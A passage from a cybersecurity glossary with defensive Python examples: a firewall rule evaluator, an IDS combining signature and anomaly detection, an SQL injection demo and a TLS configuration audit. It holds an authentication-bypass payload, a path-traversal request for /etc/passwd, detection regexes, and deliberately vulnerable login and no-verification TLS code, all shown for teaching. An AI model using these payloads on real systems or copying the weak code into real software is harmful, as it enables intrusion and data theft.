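    """Format (constructed for this demo): '<allow|deny> <proto> <src> <dst> <dport>'."""
    action, proto, src, dst, dport = line.split()

    def net(s):
        return "any" if s == "any" else ipaddress.ip_network(s, strict=False)

    return Rule(action, proto, net(src), net(dst), "any" if dport == "any" else int(dport))


def evaluate(rules, proto, src_ip, dst_ip, dport, default="deny") -> str:
    """First matching rule decides; the default policy applies when nothing matches."""
    src_ip, dst_ip = ipaddress.ip_address(src_ip), ipaddress.ip_address(dst_ip)
    for rule in rules:
        if rule.matches(proto, src_ip, dst_ip, dport):
            return rule.action
    return default


def shadowed_rules(rules):
    """Rules that can never fire because an earlier rule already covers all their traffic."""
    return [later for i, later in enumerate(rules)
            if any(earlier.covers(later) for earlier in rules[:i])]


RULESET = [parse_rule(r) for r in [
    "allow tcp 10.0.0.0/8 203.0.113.10/32 443",   # internal hosts to the public web server
    "allow udp any 10.0.0.53/32 53",              # DNS to the internal resolver
    "deny  tcp 10.0.5.0/24 any 22",               # guest VLAN may not SSH anywhere
    "allow tcp 10.0.0.0/8 any 22",                # other internal hosts may SSH
    "allow tcp 10.0.5.0/24 any 22",               # shadowed: the deny above already covers it
]]


if __name__ == "__main__":
    print(evaluate(RULESET, "tcp", "10.0.5.9", "10.0.0.1", 22))                    # deny
    print(evaluate(RULESET, "tcp", "192.0.2.1", "10.0.0.1", 3389))                 # deny (default)
    print(evaluate(RULESET, "tcp", "192.0.2.1", "10.0.0.1", 3389, default="allow"))  # allow
    print(shadowed_rules(RULESET))
```

The RDP probe from 192.0.2.1 is the case that separates the two postures: nothing in the ruleset mentions port 3389, so it is stopped only under default deny. The shadowed-rule check is the kind of lint worth running on a real rule base, where a misplaced broad "allow" silently disables the specific "deny" rules placed after it.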

Forensics

Forensic Analysis

Definition: The systematic examination of digital evidence to identify, preserve, analyze, and present facts related to cybercrime or security incidents.

Detailed Explanation: Forensic analysis follows scientific methodology to ensure evidence admissibility in court. Analysts must maintain chain of custody and use validated tools and techniques.

Analysis Techniques:

  • File System Analysis: Examining file structures, metadata, deleted files
  • Memory Analysis: Analyzing RAM for running processes, network connections
  • Network Analysis: Examining captured network traffic
  • Log Analysis: Reviewing system, application, and security logs
  • Timeline Analysis: Reconstructing event sequences
  • Malware Analysis: Reverse engineering suspicious software

Forensic Tools: EnCase, FTK, Autopsy, Volatility, Wireshark, IDA Pro

Related Terms: Cyber Forensics, Chain of Custody, Evidence Collection, Write Blocker

G

Security Role

Grey Hat Hacker

Definition: A computer security expert who falls between white hat (ethical) and black hat (malicious) hackers, often violating laws or ethical standards but without malicious intent.

Detailed Explanation: Grey hat hackers may discover and exploit vulnerabilities without authorization but typically inform the affected party. While intentions may be good, their methods are questionable and potentially illegal.

Characteristics:

  • Hack without malicious intent
  • May violate laws or ethics in research
  • Often disclose vulnerabilities publicly
  • May seek recognition or financial reward
  • Operate in ethical grey area

Controversy: Unauthorized testing is illegal in most jurisdictions regardless of intent; legitimate research needs explicit permission, or a published vulnerability disclosure policy or bug bounty program that authorizes the testing in advance

Related Terms: White Hat Hacker, Black Hat Hacker, Ethical Hacking, Responsible Disclosure

H

Security Role

Hacker

Definition: An individual with advanced computer skills who explores computer systems, networks, and software, potentially to identify vulnerabilities or gain unauthorized access.

Detailed Explanation: The term "hacker" originally referred to skilled programmers but now commonly describes those who break into systems. Hackers are categorized by motivation and ethics.

Hacker Categories:

  • White Hat (Ethical Hackers): Authorized security professionals testing systems with permission
  • Black Hat (Malicious Hackers): Criminals who break into systems for personal gain or to cause harm
  • Grey Hat: Operate between ethical and malicious, may hack without permission but without malicious intent
  • Script Kiddies: Inexperienced individuals using others' tools
  • Hacktivists: Hack for political or social causes
  • State-Sponsored: Government-backed hackers conducting cyber espionage

Related Terms: Ethical Hacking, Penetration Testing, Black Hat, White Hat

Cryptography

Hash Function

Definition: A mathematical function that converts input data of any size into a fixed-size string of characters (hash value or digest), designed to be a one-way function.

Detailed Explanation: Hash functions are fundamental to data integrity verification, password storage, digital signatures, and blockchain technology. Good hash functions have specific properties.

Properties of Cryptographic Hash Functions:

  • Deterministic: Same input always produces same output
  • Fast Computation: Quick to calculate hash value
  • One-way: Computationally infeasible to reverse
  • Collision Resistant: Hard to find two inputs with same hash
  • Avalanche Effect: Small input change drastically changes output

Common Hash Functions:

  • MD5: 128-bit, broken (collisions can be generated in seconds on commodity hardware)
  • SHA-1: 160-bit, deprecated for cryptographic use (practical collisions demonstrated in 2017)
  • SHA-256: 256-bit, widely used and secure
  • SHA-3: Latest NIST standard, built on a sponge construction unrelated to the SHA-2 design
  • BLAKE2: Fast and secure alternative

Applications: Password storage (with a unique salt and a deliberately slow construction such as bcrypt, scrypt or Argon2, never a bare hash), file integrity verification, digital signatures, blockchain, HMAC

Related Terms: Digital Signature, Salting, Rainbow Table, Checksum

Network Protocol

HTTPS (Hypertext Transfer Protocol Secure)

Definition: An extension of HTTP that uses TLS (the successor to the now-deprecated SSL) to secure communication between web browsers and servers.

Detailed Explanation: HTTPS encrypts all communication, protecting against eavesdropping and man-in-the-middle attacks. It's now the standard for all websites, especially those handling sensitive data.

How It Works:

  • TLS Handshake: Client and server negotiate encryption
  • Certificate Verification: Server proves identity with digital certificate
  • Key Exchange: Establish shared encryption keys
  • Encrypted Communication: All data encrypted using agreed-upon cipher

Benefits: Data confidentiality, integrity, authentication, SEO ranking boost, user trust

Indicators: Padlock icon in browser, "https://" in URL (modern browsers no longer show a green address bar or organization name for EV certificates)

Related Terms: SSL/TLS, Digital Certificate, Encryption, Man-in-the-Middle Attack

I

Crime Type

Identity Theft

Definition: The fraudulent acquisition and use of a person's private identifying information, usually for financial gain.

Detailed Explanation: Identity theft involves stealing personal information (name, SSN, credit card details, credentials) to impersonate victims for unauthorized purposes. It can cause significant financial and reputational damage.

Common Methods:

  • Phishing: Tricking victims into providing information
  • Data Breaches: Stealing information from compromised databases
  • Social Engineering: Manipulating people into divulging information
  • Dumpster Diving: Searching trash for discarded documents
  • Skimming: Capturing credit card data at ATMs or payment terminals
  • Malware: Keyloggers and infostealers capturing credentials

Types: Financial identity theft, medical identity theft, criminal identity theft, synthetic identity theft

Prevention: Strong passwords, credit monitoring, shredding documents, careful social media sharing, two-factor authentication

Related Terms: Phishing, Data Breach, Credit Card Fraud, Social Engineering

Security Tool

Intrusion Detection System (IDS)

Definition: A security tool that monitors network traffic or system activities for malicious activities or policy violations and generates alerts.

Detailed Explanation: IDS acts as a surveillance system, detecting potential security incidents but not actively blocking them (unlike IPS). It's crucial for identifying threats that bypass perimeter defenses.

IDS Types:

  • Network-based IDS (NIDS): Monitors network traffic
    • Placed at strategic network points
    • Analyzes packet contents and headers
    • Examples: Snort, Suricata, Zeek (Bro)
  • Host-based IDS (HIDS): Monitors single host/device
    • Examines system logs, file integrity
    • Detects local attacks
    • Examples: OSSEC, Tripwire

Detection Methods:

  • Signature-based: Matches known attack patterns
  • Anomaly-based: Detects deviations from normal behavior
  • Hybrid: Combines both approaches

Related Terms: Intrusion Prevention System (IPS), SIEM, Network Security Monitoring
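The three detection methods listed above, as an added worked example (this is not code from the glossary or from Snort, Suricata, OSSEC or any other product). It runs signature matching and a learned-baseline anomaly check over constructed log lines in a hypothetical "ip timestamp method path status" format; the two signature patterns and the baseline traffic are assumptions made up for the illustration.

```python
import re
from collections import Counter
from statistics import mean, pstdev
from typing import Optional
from urllib.parse import unquote_plus

# Signature rules, applied to the URL-decoded request path. These patterns are
# written for this example only; they are not rules from any IDS product.
SIGNATURES = {
    "path-traversal": re.compile(r"\.\./"),
    "sqli-union": re.compile(r"(?i)union\s+select"),
}

# Hypothetical log format assumed for this example: "<client-ip> <timestamp> <method> <path> <status>"
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3})$")

# Constructed "known good" traffic used to learn a per-client request-count baseline.
BASELINE_LOG = """\
10.0.0.5 2023-12-31T09:00:01 GET /index.html 200
10.0.0.5 2023-12-31T09:00:09 GET /about 200
10.0.0.6 2023-12-31T09:00:02 GET /index.html 200
10.0.0.6 2023-12-31T09:00:12 GET /contact 200
10.0.0.7 2023-12-31T09:00:03 GET /login 200
10.0.0.7 2023-12-31T09:00:04 POST /login 302
10.0.0.7 2023-12-31T09:00:05 GET /account 200
10.0.0.8 2023-12-31T09:00:06 GET /index.html 200
10.0.0.8 2023-12-31T09:00:07 GET /search?q=shoes 200
10.0.0.9 2023-12-31T09:00:08 GET /index.html 200
10.0.0.9 2023-12-31T09:00:10 GET /products 200
10.0.0.9 2023-12-31T09:00:11 GET /products/42 200
"""

# Constructed traffic to inspect: two signature hits plus one client sending a burst of requests.
OBSERVED_LOG = "\n".join(
    [
        "10.0.0.5 2024-01-01T10:00:01 GET /index.html 200",
        "10.0.0.7 2024-01-01T10:00:02 GET /login 200",
        "10.0.0.9 2024-01-01T10:00:03 GET /../../etc/passwd 404",
        "10.0.0.5 2024-01-01T10:00:04 GET /about 200",
        "10.0.0.7 2024-01-01T10:00:05 GET /search?q=1+UNION+SELECT+2 500",
    ]
    + [f"10.0.0.11 2024-01-01T10:00:{6 + i:02d} POST /login 401" for i in range(12)]
)


def parse_log(text: str) -> list:
    """Parse log lines into dicts, URL-decoding the path so an encoded payload cannot slip past the signatures."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:          # malformed line: skip it rather than crash the sensor
            continue
        ip, ts, method, path, status = m.groups()
        events.append({"ip": ip, "ts": ts, "method": method,
                       "path": unquote_plus(path), "status": int(status)})
    return events


def signature_alerts(events: list) -> list:
    """Signature-based detection: flag every event whose path matches a known-bad pattern."""
    return [(name, ev["ip"], ev["path"])
            for ev in events
            for name, pat in SIGNATURES.items()
            if pat.search(ev["path"])]


def build_baseline(events: list) -> tuple:
    """Learn what 'normal' looks like: mean and standard deviation of requests per client."""
    counts = list(Counter(ev["ip"] for ev in events).values())
    return mean(counts), pstdev(counts)


def anomaly_alerts(events: list, baseline: tuple, z_threshold: float = 3.0) -> list:
    """Anomaly-based detection: flag clients whose request count is far above the learned baseline."""
    mu, sigma = baseline
    alerts = []
    for ip, n in Counter(ev["ip"] for ev in events).items():
        z = (n - mu) / sigma if sigma > 0 else (0.0 if n == mu else float("inf"))
        if z > z_threshold:
            alerts.append(("request-rate-anomaly", ip, n))
    return alerts


def hybrid_alerts(events: list, baseline: tuple) -> list:
    """Hybrid detection: both methods together, each catching what the other misses."""
    return signature_alerts(events) + anomaly_alerts(events, baseline)


if __name__ == "__main__":
    base = build_baseline(parse_log(BASELINE_LOG))
    for alert in hybrid_alerts(parse_log(OBSERVED_LOG), base):
        print(alert)
```

The burst from 10.0.0.11 matches no signature, and the two payload-bearing requests are single events that no rate threshold would notice, which is why the hybrid run reports all three. Decoding the path before matching matters: the `+`-encoded query string would otherwise not match the `union\s+select` pattern.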

Security Tool

Intrusion Prevention System (IPS)

Definition: An active security tool that monitors network traffic for malicious activity and can automatically take action to block or prevent threats.

Detailed Explanation: Unlike IDS which only detects and alerts, IPS can actively block attacks in real-time. It sits inline in the network path, examining traffic and taking preventive action.

Capabilities:

  • Block malicious traffic: Drop packets from attacks
  • Reset connections: Terminate suspicious sessions
  • Rate limiting: Throttle suspicious traffic
  • Modify packets: Remove malicious content
  • Alert security team: Generate notifications

Deployment: Inline (directly in traffic path) vs. passive (mirror port)

Challenges: False positives can block legitimate traffic, performance impact, evasion techniques

Related Terms: Intrusion Detection System (IDS), Firewall, Next-Generation Firewall (NGFW)

J

Malware

JavaScript Malware

Definition: Malicious code written in JavaScript that executes in web browsers or other JavaScript-enabled environments to compromise systems.

Detailed Explanation: JavaScript malware exploits the ubiquity of JavaScript in web applications. It can execute without user awareness, steal data, redirect users, or download additional payloads.

Common Types:

  • Drive-by Downloads: Automatically downloading malware when visiting compromised websites
  • Browser-based Cryptominers: Mining cryptocurrency using visitor CPU resources
  • Formjacking: Stealing credit card data from e-commerce checkout forms
  • Malvertising: Malicious advertisements executing harmful scripts

Prevention: Keep browsers updated, use script blockers (NoScript), disable JavaScript for untrusted sites, web application firewalls

Related Terms: XSS, Drive-by Download, Malvertising, Web Application Security

K

Malware

Keylogger

Definition: A type of surveillance software or hardware that records every keystroke made on a computer or mobile device, capturing sensitive information like passwords and credit card numbers.

Detailed Explanation: Keyloggers operate covertly, capturing keystrokes without user knowledge. They can be software-based (malware) or hardware-based (physical devices attached to keyboards or USB ports).

Types:

  • Software Keyloggers:
    • Kernel-based: Operates at OS kernel level
    • API-based: Hooks into system APIs
    • JavaScript-based: Captures web form inputs
  • Hardware Keyloggers:
    • USB keyloggers: Devices between keyboard and computer
    • Wireless sniffers: Capture wireless keyboard transmissions
    • Acoustic keyloggers: Analyze keyboard typing sounds

Legitimate Uses: Employee monitoring, parental control, law enforcement investigations

Detection: Anti-malware software, process monitoring, physical inspection, network traffic analysis

Related Terms: Spyware, Monitoring Software, Screen Capture, Password Theft

L

Attack Technique

Lateral Movement

Definition: Techniques used by attackers to progressively move through a network, searching for key assets and data after gaining initial access.

Detailed Explanation: After compromising an initial system, attackers use lateral movement to expand their access, escalate privileges, and reach high-value targets. This is a key phase in APT attacks.

Common Techniques:

  • Pass-the-Hash: Using captured password hashes for authentication
  • Pass-the-Ticket: Exploiting Kerberos tickets
  • Remote Services: RDP, SSH, WMI, PowerShell remoting
  • Credential Dumping: Extracting credentials from memory or files
  • Exploiting Trust Relationships: Leveraging existing network trust

Detection and Mitigation: Network segmentation, monitoring lateral traffic, behavioral analysis, privileged access management

Related Terms: APT, Privilege Escalation, Network Segmentation, Zero Trust

M

Malware

Malware

Definition: Malicious software designed to damage, disrupt, or gain unauthorized access to computer systems.

Detailed Explanation: Malware is an umbrella term encompassing various types of malicious programs. It can steal data, encrypt files for ransom, spy on users, or use system resources without authorization.

Major Types:

  • Virus: Self-replicating code that attaches to files
  • Worm: Self-propagating malware spreading across networks
  • Trojan: Disguised as legitimate software
  • Ransomware: Encrypts files and demands payment
  • Spyware: Secretly monitors and collects information
  • Adware: Displays unwanted advertisements
  • Rootkit: Provides privileged access while hiding presence
  • Keylogger: Records keystrokes
  • RAT (Remote Access Trojan): Enables remote control

Infection Vectors: Email attachments, malicious downloads, infected USB drives, exploit kits, compromised websites

Related Terms: Virus, Trojan, Ransomware, Antivirus, Endpoint Security

Attack Type

Man-in-the-Middle (MitM) Attack

Definition: An attack where an attacker intercepts and potentially alters communication between two parties who believe they are directly communicating with each other.

Detailed Explanation: MitM attacks position the attacker as a relay between victim and destination, allowing interception, eavesdropping, or modification of communications. Victims are unaware of the attacker's presence.

Attack Variants:

  • ARP Spoofing: Manipulating ARP cache to intercept LAN traffic
  • DNS Spoofing: Redirecting DNS queries to malicious servers
  • Session Hijacking: Taking over active sessions
  • SSL Stripping: Downgrading HTTPS to HTTP
  • Email Hijacking: Intercepting email communications
  • Wi-Fi Eavesdropping: Monitoring unencrypted wireless traffic

Prevention: Strong encryption (HTTPS, VPN), certificate pinning, secure network protocols, avoiding public Wi-Fi for sensitive transactions

Related Terms: Session Hijacking, SSL/TLS, ARP Spoofing, Encryption

Security Concept

Multi-Factor Authentication (MFA)

Definition: A security mechanism requiring users to provide two or more verification factors to gain access to a resource.

Detailed Explanation: MFA significantly enhances security by requiring multiple independent credentials. Even if one factor is compromised, unauthorized access is prevented by remaining factors.

Authentication Factors:

  • Knowledge Factors: Something you know (password, PIN)
  • Possession Factors: Something you have (token, smart card, mobile device)
  • Inherence Factors: Something you are (biometrics)
  • Location Factors: Somewhere you are (GPS, IP address)
  • Behavioral Factors: Something you do (typing patterns)

Common MFA Methods: SMS codes, authenticator apps (Google Authenticator, Authy), hardware tokens (YubiKey), biometric authentication

Benefits: Reduced risk of credential theft, compliance requirements, protection against phishing

Related Terms: Two-Factor Authentication (2FA), Authentication, Biometrics, One-Time Password (OTP)

N

Security Concept

Network Segmentation

Definition: The practice of dividing a computer network into smaller subnetworks to improve security, performance, and management.

Detailed Explanation: Network segmentation limits the blast radius of security breaches by isolating critical assets and restricting lateral movement. It implements defense-in-depth principles.

Segmentation Methods:

  • Physical Segmentation: Separate physical devices and cables
  • Logical Segmentation: VLANs, subnets, software-defined networking
  • Microsegmentation: Fine-grained isolation at workload level

Benefits: Contained breaches, improved performance, easier compliance, better network visibility

Related Terms: VLAN, Firewall, Zero Trust, Microsegmentation, Defense in Depth

O

Security Concept

One-Time Password (OTP)

Definition: A password that is valid for only one login session or transaction, providing enhanced security over static passwords.

Detailed Explanation: OTPs are generated dynamically and expire quickly, making them resistant to replay attacks and credential theft. They're commonly used in multi-factor authentication.

OTP Types:

  • Time-based OTP (TOTP): Changes every 30-60 seconds (Google Authenticator)
  • Counter-based OTP (HOTP): Changes with each use
  • SMS OTP: Sent via text message
  • Email OTP: Sent via email

Generation Methods: Hardware tokens, mobile apps, SMS, email

Related Terms: Multi-Factor Authentication, Two-Factor Authentication, TOTP, Authenticator App

P

Attack Type

Phishing

Definition: A social engineering attack using fraudulent communications (typically email) to trick recipients into divulging sensitive information or installing malware.

Detailed Explanation: Phishing exploits human psychology rather than technical vulnerabilities. Attackers impersonate trusted entities to create urgency, fear, or curiosity, prompting victims to act without careful consideration.

Phishing Types:

  • Email Phishing: Mass emails to broad audience
  • Spear Phishing: Targeted attacks using personalized information
  • Whaling: Targeting high-level executives
  • Clone Phishing: Replicating legitimate emails with malicious modifications
  • Vishing: Voice phishing using phone calls
  • Smishing: SMS-based phishing
  • Business Email Compromise (BEC): Impersonating business executives

Red Flags: Urgent language, suspicious sender addresses, generic greetings, unexpected attachments, requests for sensitive information

Prevention: Security awareness training, email filtering, domain authentication (SPF, DKIM, DMARC), multi-factor authentication

Related Terms: Social Engineering, Spear Phishing, Vishing, Smishing, Email Security

Cryptography

Public Key Infrastructure (PKI)

Definition: A framework of policies, procedures, hardware, software, and people to create, manage, distribute, use, store, and revoke digital certificates.

Detailed Explanation: PKI enables secure electronic transfer of information by binding public keys to entities. It's the foundation of trust in online communications, e-commerce, and secure access.

PKI Components:

  • Certificate Authority (CA): Issues and manages digital certificates
  • Registration Authority (RA): Verifies certificate requests
  • Digital Certificates: Bind public keys to identities
  • Certificate Repository: Stores and distributes certificates
  • Certificate Revocation List (CRL): Lists revoked certificates

Applications: HTTPS/SSL/TLS, email encryption (S/MIME), code signing, VPN, document signing

Related Terms: Digital Certificate, Certificate Authority, SSL/TLS, Asymmetric Encryption

Q

Security Concept

Quarantine

Definition: The isolation of suspected malicious files or infected systems to prevent spread of malware while allowing for further analysis.

Detailed Explanation: Quarantine is a containment strategy used by antivirus software and security systems to safely handle potentially harmful files without deleting them immediately, allowing for investigation and potential recovery of false positives.

Quarantine Process:

  • Detection of suspicious file or activity
  • Isolation from system and network
  • Analysis of threat level
  • Decision: Delete, restore, or continue monitoring

Applications: Antivirus quarantine, email filtering, network isolation

Related Terms: Antivirus, Malware, Sandbox, Network Isolation

R

Malware

Ransomware

Definition: Malicious software that encrypts a victim's files or locks their system, demanding payment (ransom) for restoration of access.

Detailed Explanation: Ransomware is one of the most damaging forms of malware, causing billions in losses annually. It combines encryption technology with extortion, often threatening to publish stolen data if ransom isn't paid.

Ransomware Types:

  • Crypto Ransomware: Encrypts files (most common)
  • Locker Ransomware: Locks entire device
  • Scareware: Fake warnings demanding payment
  • Doxware/Leakware: Threatens to publish stolen data
  • RaaS (Ransomware as a Service): Ransomware sold to affiliates

Attack Vectors: Phishing emails, exploit kits, RDP vulnerabilities, malicious downloads

Famous Examples: WannaCry, NotPetya, Ryuk, CryptoLocker

Prevention: Regular backups, email filtering, software updates, network segmentation, user training, disable RDP if not needed

Related Terms: Malware, Encryption, Backup, Phishing, Exploit Kit

Malware

Rootkit

Definition: Malicious software designed to gain privileged access to a computer while hiding its presence from users and security tools.

Detailed Explanation: Rootkits operate at low system levels, modifying operating system functions to conceal malicious activity. They're particularly dangerous because they're difficult to detect and remove.

Rootkit Types:

  • User-mode Rootkits: Operate at application level
  • Kernel-mode Rootkits: Operate at OS kernel level
  • Bootkit: Loads before OS, extremely hard to detect
  • Firmware Rootkit: Infects device firmware (BIOS, UEFI)
  • Hypervisor Rootkit: Operates below OS using virtualization

Detection: Behavior analysis, memory dump analysis, integrity checking, specialized rootkit detection tools

Related Terms: Malware, Backdoor, Privilege Escalation, Firmware

S

Attack Technique

Social Engineering

Definition: Psychological manipulation of people into performing actions or divulging confidential information, exploiting human trust rather than technical vulnerabilities.

Detailed Explanation: Social engineering is often the weakest link in security. Attackers exploit human psychology (trust, authority, urgency, fear) to bypass technical defenses entirely.

Common Techniques:

  • Phishing: Fraudulent communications
  • Pretexting: Creating fabricated scenarios
  • Baiting: Offering something enticing (infected USB drives)
  • Quid Pro Quo: Offering service in exchange for information
  • Tailgating: Following authorized person into restricted area
  • Impersonation: Posing as trusted authority

Psychological Principles Exploited: Authority, urgency, scarcity, trust, fear, reciprocity

Defense: Security awareness training, verification procedures, clear security policies, healthy skepticism

Related Terms: Phishing, Pretexting, Human Hacking, Security Awareness

Malware

Spyware

Definition: Malicious software that secretly monitors and collects information about users' activities without their knowledge or consent.

Detailed Explanation: Spyware operates covertly to gather sensitive information including browsing habits, keystrokes, login credentials, financial data, and personal communications. It can severely impact system performance and user privacy.

Types of Spyware:

  • Keyloggers: Record keystrokes
  • Screen Scrapers: Capture screenshots
  • Adware: Tracks browsing for advertising
  • Tracking Cookies: Monitor web activity
  • System Monitors: Log system activities
  • Infostealers: Collect and exfiltrate sensitive data

Detection: Unusual system performance, unexpected pop-ups, changed settings, anti-spyware software

Related Terms: Keylogger, Malware, Privacy, Surveillance, Trojan

Attack Type

SQL Injection

Definition: A code injection attack that exploits vulnerabilities in database-driven applications by inserting malicious SQL statements into input fields.

Detailed Explanation: SQL injection allows attackers to interfere with database queries, potentially reading sensitive data, modifying database content, or executing administrative operations. It's one of the most common web application vulnerabilities.

Attack Types:

  • In-band SQL Injection: Same channel for attack and results
  • Blind SQL Injection: No direct output, infer results from behavior
  • Out-of-band SQL Injection: Uses different channels

Impact: Data theft, authentication bypass, data modification, database server compromise

Prevention: Parameterized queries (prepared statements), input validation, least privilege database accounts, WAF, stored procedures

Related Terms: Web Application Security, Input Validation, Database Security, Code Injection
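The first prevention listed above, parameterized queries, next to the query construction that makes in-band injection and authentication bypass possible, as an added example (this is not code from the glossary or from any framework). It uses Python's standard `sqlite3` module with an in-memory database; the `users` table, the single row in it and the placeholder hash string are constructed for the illustration, and a real login would compare a salted password hash rather than a stored string.

```python
import sqlite3


def make_demo_db() -> sqlite3.Connection:
    """In-memory database with one constructed user row (the hash value is a placeholder string)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password_hash TEXT NOT NULL)")
    conn.execute("INSERT INTO users VALUES ('alice', 'placeholder-hash-of-alice-password')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password_hash: str) -> list:
    """Vulnerable: user input is spliced into the SQL text, so a quote in the input
    rewrites the statement's logic instead of being compared as a value."""
    query = (f"SELECT username FROM users "
             f"WHERE username = '{username}' AND password_hash = '{password_hash}'")
    return conn.execute(query).fetchall()


def login_safe(conn: sqlite3.Connection, username: str, password_hash: str) -> list:
    """Hardened: a parameterized query (prepared statement). The driver passes the values
    separately from the SQL text, so input is only ever treated as data."""
    query = "SELECT username FROM users WHERE username = ? AND password_hash = ?"
    return conn.execute(query, (username, password_hash)).fetchall()


if __name__ == "__main__":
    db = make_demo_db()
    tautology = "' OR '1'='1"   # turns the WHERE clause into one that is always true
    print("vulnerable:", login_vulnerable(db, "alice", tautology))   # alice's row: bypass
    print("safe:      ", login_safe(db, "alice", tautology))         # []: compared as a string
```

In the vulnerable form the statement becomes `... WHERE username = 'alice' AND password_hash = '' OR '1'='1'`, and SQL's operator precedence makes the whole clause true for every row. The parameterized form sends exactly the same input and returns nothing, because the string is compared against the stored hash rather than parsed as SQL.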

Protocol

SSL/TLS (Secure Sockets Layer / Transport Layer Security)

Definition: Cryptographic protocols providing secure communications over computer networks, primarily used for HTTPS web traffic.

Detailed Explanation: SSL is the predecessor to TLS. Both provide encryption, authentication, and data integrity for internet communications. TLS 1.2 and 1.3 are current standards; SSL is deprecated due to vulnerabilities.

Functions:

  • Encryption: Protects data confidentiality
  • Authentication: Verifies server (and optionally client) identity
  • Integrity: Detects message tampering

TLS Handshake Process: Client hello, server hello, certificate exchange, key exchange, session established

Applications: HTTPS websites, email (SMTPS, IMAPS), VPN, file transfer (FTPS)

Related Terms: HTTPS, Digital Certificate, Encryption, Public Key Infrastructure
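What the Authentication function above means in practice, as an added example (this is not code from the glossary or from any library's documentation): a TLS client configuration with certificate verification switched off beside the corrected configuration, using Python's standard `ssl` module. It also covers the HTTPS and Man-in-the-Middle entries, since a client that skips verification accepts whatever certificate an interposed party presents. The `audit_context` helper and its finding strings are an assumed checklist written for this example.

```python
import ssl
from typing import List, Optional


def insecure_client_context() -> ssl.SSLContext:
    """Weak setting: certificate verification is switched off, so an interposed party
    presenting any certificate at all is accepted as the real server."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False          # must be cleared first; CERT_NONE is refused otherwise
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def hardened_client_context(cafile: Optional[str] = None) -> ssl.SSLContext:
    """Corrected setting: verify the server's certificate chain against trusted CAs,
    check that the hostname matches, and refuse deprecated protocol versions."""
    ctx = ssl.create_default_context(cafile=cafile)   # CERT_REQUIRED and check_hostname=True
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2      # SSL 3.0, TLS 1.0 and TLS 1.1 are refused
    return ctx


def audit_context(ctx: ssl.SSLContext) -> List[str]:
    """Assumed checklist for this example: return the findings a reviewer would raise."""
    findings = []
    if ctx.verify_mode != ssl.CERT_REQUIRED:
        findings.append("server certificate not verified")
    if not ctx.check_hostname:
        findings.append("hostname not checked against certificate")
    if ctx.minimum_version < ssl.TLSVersion.TLSv1_2:
        findings.append("deprecated protocol versions allowed")
    return findings


if __name__ == "__main__":
    print("insecure:", audit_context(insecure_client_context()))
    print("hardened:", audit_context(hardened_client_context()))
```

The hardened context is the one to hand to `ssl.wrap`-style APIs such as `http.client.HTTPSConnection(host, context=ctx)`; with it, a certificate that is self-signed, expired, issued for another name or presented by a downgrade proxy fails the handshake instead of silently succeeding.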

T

Network Tool

Tor (The Onion Router)

Definition: An anonymity network that encrypts and routes internet traffic through multiple relay servers to conceal user location and usage from surveillance or traffic analysis.

Detailed Explanation: Tor provides privacy and anonymity by routing traffic through at least three randomly selected nodes, with each layer encrypted (like an onion). No single node knows both the source and destination.

How It Works:

  • User connects to entry node (guard)
  • Traffic passes through middle relay(s)
  • Exit node connects to final destination
  • Each layer of encryption is removed at each hop

Legitimate Uses: Privacy protection, censorship circumvention, whistleblowing, journalism, activism

Concerns: Can be used for illegal activities, exit nodes can monitor unencrypted traffic

Related Terms: Anonymity, VPN, Dark Web, Privacy, Encryption

Malware

Trojan Horse

Definition: Malicious software disguised as legitimate or benign programs that performs harmful actions once installed.

Detailed Explanation: Named after the Greek mythological wooden horse, Trojans deceive users into installing them by appearing useful or harmless. Unlike viruses, they don't self-replicate.

Common Types:

  • Backdoor Trojans: Provide remote access
  • Banking Trojans: Steal financial credentials
  • Downloader Trojans: Download additional malware
  • Ransomware Trojans: Encrypt files for ransom
  • RAT (Remote Access Trojan): Enable full remote control
  • Infostealer Trojans: Harvest sensitive information

Distribution: Software downloads, email attachments, fake updates, infected USB drives

Related Terms: Malware, RAT, Backdoor, Social Engineering

Security Concept

Two-Factor Authentication (2FA)

Definition: A security mechanism requiring users to provide two different authentication factors to verify their identity.

Detailed Explanation: 2FA is a subset of Multi-Factor Authentication (MFA), specifically requiring exactly two factors. It significantly reduces risk of unauthorized access even if one factor (typically password) is compromised.

Common 2FA Methods:

  • SMS OTP: Code sent via text message (less secure)
  • Authenticator Apps: TOTP codes (Google Authenticator, Authy)
  • Hardware Tokens: Physical devices generating codes (YubiKey)
  • Push Notifications: Approve/deny requests on mobile app
  • Biometrics + Password: Fingerprint or face recognition

Benefits: Stronger security than passwords alone, protects against phishing and credential stuffing

Related Terms: Multi-Factor Authentication (MFA), One-Time Password (OTP), Authentication, TOTP

U

Security Concept

User Access Control (UAC)

Definition: A Windows security feature that helps prevent unauthorized changes to the operating system by prompting for permission or administrator credentials.

Detailed Explanation: UAC creates a barrier between standard user operations and administrative tasks, requiring explicit consent for privileged actions. This limits malware damage by preventing unauthorized system changes.

Protection Mechanisms:

  • Prompts for elevation when administrative access needed
  • Runs applications with standard user privileges by default
  • Secure desktop for credential input
  • File and registry virtualization

Related Terms: Privilege Escalation, Least Privilege, Access Control, Windows Security

V

Malware

Virus

Definition: A type of malicious software that replicates by inserting copies of itself into other programs, files, or boot sectors, typically requiring user action to spread.

Detailed Explanation: Viruses attach themselves to host files and execute when the host is run. They can corrupt or delete data, consume system resources, or provide backdoor access to attackers.

Virus Types:

  • File Infector: Attaches to executable files
  • Boot Sector: Infects master boot record
  • Macro Virus: Embedded in documents (Word, Excel)
  • Polymorphic: Changes code to evade detection
  • Metamorphic: Rewrites itself completely
  • Multipartite: Infects multiple targets

Distinction from Worms: Viruses require host file and user action to spread; worms self-propagate

Related Terms: Malware, Worm, Antivirus, Infection Vector

Network Tool

VPN (Virtual Private Network)

Definition: A technology that creates a secure, encrypted connection over a less secure network (like the internet), extending a private network across a public network.

Detailed Explanation: VPNs encrypt all traffic between the user's device and the VPN server, hiding the user's IP address and protecting data from eavesdropping. They're essential for remote work and privacy protection.

VPN Types:

  • Remote Access VPN: Connects individual users to private network
  • Site-to-Site VPN: Connects entire networks together
  • SSL VPN: Browser-based, no client software needed
  • IPsec VPN: Network-layer encryption

